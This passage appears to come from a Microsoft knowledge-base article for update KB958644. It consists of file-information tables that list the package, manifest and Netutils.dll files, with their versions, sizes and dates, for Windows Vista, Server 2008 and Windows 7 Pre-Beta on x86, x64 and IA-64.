Netutils.dll | 6.1.6801.4107 | 22,528 | 20-Oct-2008 | 23:19 | x86


For all supported x64-based versions of Windows 7 Pre-Beta

File name | File version | File size | Date | Time | Platform
Netutils.dll | 6.1.6801.4107 | 29,184 | 20-Oct-2008 | 23:47 | x64
Netutils.dll | 6.1.6801.4107 | 22,528 | 20-Oct-2008 | 23:19 | x86


For all supported ia64-based versions of Windows 7 Pre-Beta

File name | File version | File size | Date | Time | Platform
Netutils.dll | 6.1.6801.4107 | 59,904 | 20-Oct-2008 | 23:08 | IA-64
Netutils.dll | 6.1.6801.4107 | 22,528 | 20-Oct-2008 | 23:19 | x86

Additional file information for Windows Server 2008, for Windows Vista, and for Windows 7 Pre-Beta

Additional files for all supported x86-based versions of Windows Server 2008, Windows Vista

File name | File version | File size | Date (UTC) | Time (UTC) | Platform
Package_1_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,743 | 16-Oct-2008 | 15:02 | Not Applicable
Package_1_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 2,445 | 16-Oct-2008 | 15:02 | Not Applicable
Package_2_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,906 | 16-Oct-2008 | 15:02 | Not Applicable
Package_2_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 2,612 | 16-Oct-2008 | 15:02 | Not Applicable
Package_3_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,748 | 16-Oct-2008 | 15:02 | Not Applicable
Package_3_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 2,450 | 16-Oct-2008 | 15:02 | Not Applicable
Package_4_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,748 | 16-Oct-2008 | 15:02 | Not Applicable
Package_4_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 2,452 | 16-Oct-2008 | 15:02 | Not Applicable
Package_5_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,748 | 16-Oct-2008 | 15:02 | Not Applicable
Package_5_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 2,452 | 16-Oct-2008 | 15:02 | Not Applicable
Package_6_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,744 | 16-Oct-2008 | 15:02 | Not Applicable
Package_6_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 2,447 | 16-Oct-2008 | 15:02 | Not Applicable
Package_for_kb958644_client_0_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,416 | 16-Oct-2008 | 15:02 | Not Applicable
Package_for_kb958644_client_0~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,435 | 16-Oct-2008 | 15:02 | Not Applicable
Package_for_kb958644_client_1_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,357 | 16-Oct-2008 | 15:02 | Not Applicable
Package_for_kb958644_client_1~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,376 | 16-Oct-2008 | 15:02 | Not Applicable
Package_for_kb958644_client_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,691 | 16-Oct-2008 | 15:02 | Not Applicable
Package_for_kb958644_client~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,722 | 16-Oct-2008 | 15:02 | Not Applicable
Package_for_kb958644_sc_0_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,411 | 16-Oct-2008 | 15:02 | Not Applicable
Package_for_kb958644_sc_0~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,431 | 16-Oct-2008 | 15:02 | Not Applicable
Package_for_kb958644_sc_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,413 | 16-Oct-2008 | 15:02 | Not Applicable
Package_for_kb958644_sc~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,432 | 16-Oct-2008 | 15:02 | Not Applicable
Package_for_kb958644_server_0_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,415 | 16-Oct-2008 | 15:02 | Not Applicable
Package_for_kb958644_server_0~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,434 | 16-Oct-2008 | 15:02 | Not Applicable
Package_for_kb958644_server_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,421 | 16-Oct-2008 | 15:02 | Not Applicable
Package_for_kb958644_server~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,440 | 16-Oct-2008 | 15:02 | Not Applicable
Package_for_kb958644_winpesrv_0_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,412 | 16-Oct-2008 | 15:02 | Not Applicable
Package_for_kb958644_winpesrv_0~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,431 | 16-Oct-2008 | 15:02 | Not Applicable
Package_for_kb958644_winpesrv_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,420 | 16-Oct-2008 | 15:02 | Not Applicable
Package_for_kb958644_winpesrv~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,439 | 16-Oct-2008 | 15:02 | Not Applicable
Package_for_kb958644_winpe_0_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,410 | 16-Oct-2008 | 15:02 | Not Applicable

File name

Package_for_kb958644_winpe_0~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,429

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpe_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,414

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpe~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,433

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Update-bf.mum

File version

Not Applicable

File size

3,493

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

X86_36258762845e107951bd9aa6bb6e2cf2_31bf3856ad364e35_6.0.6000.20937_none_1b3e8fbe3df577d5.manifest

File version

Not Applicable

File size

696

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

X86_839cbb983f595ac76fde121c813c640b_31bf3856ad364e35_6.0.6000.16764_none_c31a32b5eaec82f7.manifest

File version

Not Applicable

File size

696

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

X86_8beec6c9c4e53ad3ad4e2eefee83c7bb_31bf3856ad364e35_6.0.6001.22288_none_24746e8695e50ab0.manifest

File version

Not Applicable

File size

696

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

X86_cf5fc08aa887a883eefd054adf032c14_31bf3856ad364e35_6.0.6001.18157_none_f5617edb87321701.manifest

File version

Not Applicable

File size

696

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.16764_none_8b10fff30496576a.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

05:29

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.20937_none_8bbe0f461d98ec8d.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

04:57

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.18157_none_8d050f6301b2186f.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

05:24

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.22288_none_8d6f3cb41ae72563.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

05:09

Platform

Not Applicable


Additional files for all supported x64-based versions of Windows Server 2008, Hyper-V Server 2008, and Windows Vista

| File name | File version | File size | Date (UTC) | Time (UTC) | Platform |
|---|---|---|---|---|---|
| Amd64_016ff16d0fb7adfd32cc8cac619f7020_31bf3856ad364e35_6.0.6001.22288_none_63879e5572c63a8d.manifest | Not Applicable | 1,040 | 16-Oct-2008 | 15:02 | Not Applicable |
| Amd64_17b51416d1f0879bd01802235d17e183_31bf3856ad364e35_6.0.6001.18157_none_059d2147a43b46c0.manifest | Not Applicable | 1,040 | 16-Oct-2008 | 15:02 | Not Applicable |
| Amd64_4a708e10febe190d564ab30203394f1c_31bf3856ad364e35_6.0.6000.16764_none_7838dfe143478799.manifest | Not Applicable | 700 | 16-Oct-2008 | 15:02 | Not Applicable |
| Amd64_67941fc4deac88f98600b6aa3d634fa5_31bf3856ad364e35_6.0.6001.18157_none_7700084c05e335ee.manifest | Not Applicable | 700 | 16-Oct-2008 | 15:02 | Not Applicable |
| Amd64_73aa7275aac93043dad7f68b22dc689e_31bf3856ad364e35_6.0.6000.20937_none_8d173e2dc1c0db98.manifest | Not Applicable | 700 | 16-Oct-2008 | 15:02 | Not Applicable |
| Amd64_854c9ca1f90fdf0fef990f5d99c75b11_31bf3856ad364e35_6.0.6001.22288_none_48ff81aaf19bff94.manifest | Not Applicable | 700 | 16-Oct-2008 | 15:02 | Not Applicable |
| Amd64_c889ea7b0835e36fc67c4ccc4ec07ed3_31bf3856ad364e35_6.0.6000.16764_none_c5bae36e7a056bed.manifest | Not Applicable | 1,040 | 16-Oct-2008 | 15:02 | Not Applicable |
| Amd64_f9502c7e5f482bc6c92ce8f63becff94_31bf3856ad364e35_6.0.6000.20937_none_c14b7e8f3e6dce2d.manifest | Not Applicable | 1,040 | 16-Oct-2008 | 15:02 | Not Applicable |
| Amd64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.16764_none_e72f9b76bcf3c8a0.manifest | Not Applicable | 12,067 | 16-Oct-2008 | 05:21 | Not Applicable |
| Amd64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.20937_none_e7dcaac9d5f65dc3.manifest | Not Applicable | 12,067 | 16-Oct-2008 | 05:01 | Not Applicable |
| Amd64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.18157_none_e923aae6ba0f89a5.manifest | Not Applicable | 12,067 | 16-Oct-2008 | 06:39 | Not Applicable |
| Amd64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.22288_none_e98dd837d3449699.manifest | Not Applicable | 12,067 | 16-Oct-2008 | 05:38 | Not Applicable |
| Package_1_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,753 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_1_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 2,459 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_2_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 2,126 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_2_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 3,056 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_3_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,966 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_3_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 2,892 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_4_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,966 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_4_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 2,894 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_5_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,966 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_5_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 2,894 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_6_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,754 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_6_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 2,461 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_client_0_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,424 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_client_0~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,443 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_client_1_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,365 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_client_1~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,384 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_client_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,701 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_client~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,732 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_sc_0_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,419 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_sc_0~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,439 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_sc_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,421 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_sc~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,440 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_server_0_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,423 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_server_0~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,442 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_server_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,429 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_server~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,448 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpesrv_0_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,420 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpesrv_0~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,439 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpesrv_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,428 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpesrv~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,447 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpe_0_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,418 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpe_0~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,437 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpe_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,422 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpe~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,441 | 16-Oct-2008 | 15:02 | Not Applicable |
| Update-bf.mum | Not Applicable | 3,519 | 16-Oct-2008 | 15:02 | Not Applicable |
| X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.16764_none_8b10fff30496576a.manifest | Not Applicable | 12,029 | 16-Oct-2008 | 05:29 | Not Applicable |
| X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.20937_none_8bbe0f461d98ec8d.manifest | Not Applicable | 12,029 | 16-Oct-2008 | 04:57 | Not Applicable |
| X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.18157_none_8d050f6301b2186f.manifest | Not Applicable | 12,029 | 16-Oct-2008 | 05:24 | Not Applicable |
| X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.22288_none_8d6f3cb41ae72563.manifest | Not Applicable | 12,029 | 16-Oct-2008 | 05:09 | Not Applicable |


Additional files for all supported IA-64-based versions of Windows Server 2008

| File name | File version | File size | Date (UTC) | Time (UTC) | Platform |
|---|---|---|---|---|---|
| Ia64_5318e8eb9e87d0695533f066c047f96b_31bf3856ad364e35_6.0.6001.18157_none_82a29afb7aa0d23c.manifest | Not Applicable | 698 | 16-Oct-2008 | 15:02 | Not Applicable |
| Ia64_9c84e32c7f67dae6326ee85998cad9e6_31bf3856ad364e35_6.0.6001.18157_none_9713870461709fdd.manifest | Not Applicable | 1,038 | 16-Oct-2008 | 15:02 | Not Applicable |
| Ia64_f1b22e2871aa832be2376a26d588f7f5_31bf3856ad364e35_6.0.6001.22288_none_d0e8a3e531733c64.manifest | Not Applicable | 1,038 | 16-Oct-2008 | 15:02 | Not Applicable |
| Ia64_f420bbd70e5d59529cd3c0d55fc47000_31bf3856ad364e35_6.0.6001.22288_none_fa8a6023da16ba48.manifest | Not Applicable | 698 | 16-Oct-2008 | 15:02 | Not Applicable |
| Ia64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.18157_none_8d06b35901b0216b.manifest | Not Applicable | 12,048 | 16-Oct-2008 | 08:04 | Not Applicable |
| Ia64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.22288_none_8d70e0aa1ae52e5f.manifest | Not Applicable | 12,048 | 16-Oct-2008 | 06:02 | Not Applicable |
| Package_1_for_kb958644_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,748 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_1_for_kb958644~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 2,452 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_2_for_kb958644_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,961 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_2_for_kb958644~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 2,885 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_3_for_kb958644_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,961 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_3_for_kb958644~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 2,885 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_sc_0_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,415 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_sc_0~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,434 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_sc_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,416 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_sc~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,436 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_server_0_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,419 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_server_0~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,438 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_server_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,424 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_server~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,444 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpesrv_0_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,416 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpesrv_0~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,435 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpesrv_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,423 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpesrv~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,443 | 16-Oct-2008 | 15:02 | Not Applicable |
| Update-bf.mum | Not Applicable | 2,381 | 16-Oct-2008 | 15:02 | Not Applicable |
| X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.18157_none_8d050f6301b2186f.manifest | Not Applicable | 12,029 | 16-Oct-2008 | 05:24 | Not Applicable |
| X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.22288_none_8d6f3cb41ae72563.manifest | Not Applicable | 12,029 | 16-Oct-2008 | 05:09 | Not Applicable |

Additional file information for Windows 7 Pre-Beta

Additional files for all supported x86-based versions of Windows 7 Pre-Beta

| File name | File version | File size | Date (UTC) | Time (UTC) | Platform |
|---|---|---|---|---|---|
| Package_1_for_kb958644~31bf3856ad364e35~x86~~6.1.1.0.mum | Not Applicable | 1,817 | 18-Oct-2008 | 09:47 | Not Applicable |
| Package_1_for_kb958644~31bf3856ad364e35~x86~~6.1.1.1.mum | Not Applicable | 1,817 | 21-Oct-2008 | 21:07 | Not Applicable |
| Package_2_for_kb958644~31bf3856ad364e35~x86~~6.1.1.0.mum | Not Applicable | 1,822 | 18-Oct-2008 | 09:47 | Not Applicable |
| Package_2_for_kb958644~31bf3856ad364e35~x86~~6.1.1.1.mum | Not Applicable | 1,822 | 21-Oct-2008 | 21:07 | Not Applicable |
| Package_for_kb958644_client_0~31bf3856ad364e35~x86~~6.1.1.0.mum | Not Applicable | 1,468 | 18-Oct-2008 | 09:47 | Not Applicable |
| Package_for_kb958644_client_0~31bf3856ad364e35~x86~~6.1.1.1.mum | Not Applicable | 1,468 | 21-Oct-2008 | 21:07 | Not Applicable |
| Package_for_kb958644_client~31bf3856ad364e35~x86~~6.1.1.0.mum | Not Applicable | 1,456 | 18-Oct-2008 | 09:47 | Not Applicable |
| Package_for_kb958644_client~31bf3856ad364e35~x86~~6.1.1.1.mum | Not Applicable | 1,456 | 21-Oct-2008 | 21:07 | Not Applicable |
| Package_for_kb958644_winpe_0~31bf3856ad364e35~x86~~6.1.1.0.mum | Not Applicable | 1,462 | 18-Oct-2008 | 09:47 | Not Applicable |
| Package_for_kb958644_winpe_0~31bf3856ad364e35~x86~~6.1.1.1.mum | Not Applicable | 1,462 | 21-Oct-2008 | 21:07 | Not Applicable |
| Package_for_kb958644_winpe~31bf3856ad364e35~x86~~6.1.1.0.mum | Not Applicable | 1,466 | 18-Oct-2008 | 09:47 | Not Applicable |
| Package_for_kb958644_winpe~31bf3856ad364e35~x86~~6.1.1.1.mum | Not Applicable | 1,466 | 21-Oct-2008 | 21:07 | Not Applicable |
| X86_8c88416a1b833ae7bf1ac5e3ba55e123_31bf3856ad364e35_6.1.6801.4107_none_5d2c1db358bd7f56.manifest | Not Applicable | 694 | 21-Oct-2008 | 21:07 | Not Applicable |
| X86_9622219576c10955b3e5860711ff058f_31bf3856ad364e35_6.1.6801.4106_none_977a59a5a18b9d73.manifest | Not Applicable | 694 | 18-Oct-2008 | 09:47 | Not Applicable |
| X86_microsoft-windows-netapi32_31bf3856ad364e35_6.1.6801.4106_none_c611da9707b43041.manifest | Not Applicable | 2,401 | 18-Oct-2008 | 06:13 | Not Applicable |
| X86_microsoft-windows-netutils_31bf3856ad364e35_6.1.6801.4107_none_68ebfd37504551fa.manifest | Not Applicable | 2,187 | 21-Oct-2008 | 08:25 | Not Applicable |

Additional files for all supported x64-based versions of Windows 7 Pre-Beta

| File name | File version | File size | Date (UTC) | Time (UTC) | Platform |
|---|---|---|---|---|---|
| Amd64_6c5ff7f4df12fe656967bcd9a0851cf9_31bf3856ad364e35_6.1.6801.4107_none_9d8d50283e89a478.manifest | Not Applicable | 698 | 21-Oct-2008 | 21:07 | Not Applicable |
| Amd64_8bb4665ee38b9909b49c6690c13a54c9_31bf3856ad364e35_6.1.6801.4106_none_abaa496388f1d851.manifest | Not Applicable | 1,037 | 18-Oct-2008 | 09:47 | Not Applicable |
| Amd64_8c88416a1b833ae7bf1ac5e3ba55e123_31bf3856ad364e35_6.1.6801.4107_none_b94ab937111af08c.manifest | Not Applicable | 696 | 21-Oct-2008 | 21:07 | Not Applicable |
| Amd64_9622219576c10955b3e5860711ff058f_31bf3856ad364e35_6.1.6801.4106_none_f398f52959e90ea9.manifest | Not Applicable | 696 | 18-Oct-2008 | 09:47 | Not Applicable |
| Amd64_9ac4fb3739ecadbb3fe4552a8ce044b5_31bf3856ad364e35_6.1.6801.4106_none_5b9a53630b032ec0.manifest | Not Applicable | 698 | 18-Oct-2008 | 09:47 | Not Applicable |
| Amd64_f2e520fe3e78b2637293494b1895dead_31bf3856ad364e35_6.1.6801.4107_none_88b415476ce0db7b.manifest | Not Applicable | 1,037 | 21-Oct-2008 | 21:07 | Not Applicable |
| Amd64_microsoft-windows-netapi32_31bf3856ad364e35_6.1.6801.4106_none_2230761ac011a177.manifest | Not Applicable | 2,403 | 18-Oct-2008 | 06:26 | Not Applicable |
| Amd64_microsoft-windows-netutils_31bf3856ad364e35_6.1.6801.4107_none_c50a98bb08a2c330.manifest | Not Applicable | 2,189 | 21-Oct-2008 | 08:33 | Not Applicable |
| Package_1_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 1,827 | 18-Oct-2008 | 09:47 | Not Applicable |
| Package_1_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 1,827 | 21-Oct-2008 | 21:07 | Not Applicable |
| Package_2_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 2,045 | 18-Oct-2008 | 09:47 | Not Applicable |
| Package_2_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 2,045 | 21-Oct-2008 | 21:07 | Not Applicable |
| Package_3_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 2,045 | 18-Oct-2008 | 09:47 | Not Applicable |
| Package_3_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 2,045 | 21-Oct-2008 | 21:07 | Not Applicable |
| Package_4_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 1,832 | 18-Oct-2008 | 09:47 | Not Applicable |
| Package_4_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 1,832 | 21-Oct-2008 | 21:07 | Not Applicable |
| Package_5_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 1,814 | 18-Oct-2008 | 09:47 | Not Applicable |
| Package_5_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 1,814 | 21-Oct-2008 | 21:07 | Not Applicable |
| Package_for_kb958644_client_0~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 1,476 | 18-Oct-2008 | 09:47 | Not Applicable |
| Package_for_kb958644_client_0~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 1,476 | 21-Oct-2008 | 21:07 | Not Applicable |
| Package_for_kb958644_client~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 1,465 | 18-Oct-2008 | 09:47 | Not Applicable |
| Package_for_kb958644_client~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 1,465 | 21-Oct-2008 | 21:07 | Not Applicable |
| Package_for_kb958644_sc_0~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 1,951 | 18-Oct-2008 | 09:47 | Not Applicable |
| Package_for_kb958644_sc_0~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 1,951 | 21-Oct-2008 | 21:07 | Not Applicable |
| Package_for_kb958644_sc~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 1,474 | 18-Oct-2008 | 09:47 | Not Applicable |
| Package_for_kb958644_sc~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 1,474 | 21-Oct-2008 | 21:07 | Not Applicable |
| Package_for_kb958644_server_0~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 1,476 | 18-Oct-2008 | 09:47 | Not Applicable |
| Package_for_kb958644_server_0~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 1,476 | 21-Oct-2008 | 21:07 | Not Applicable |
| Package_for_kb958644_server~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 1,465 | 18-Oct-2008 | 09:47 | Not Applicable |
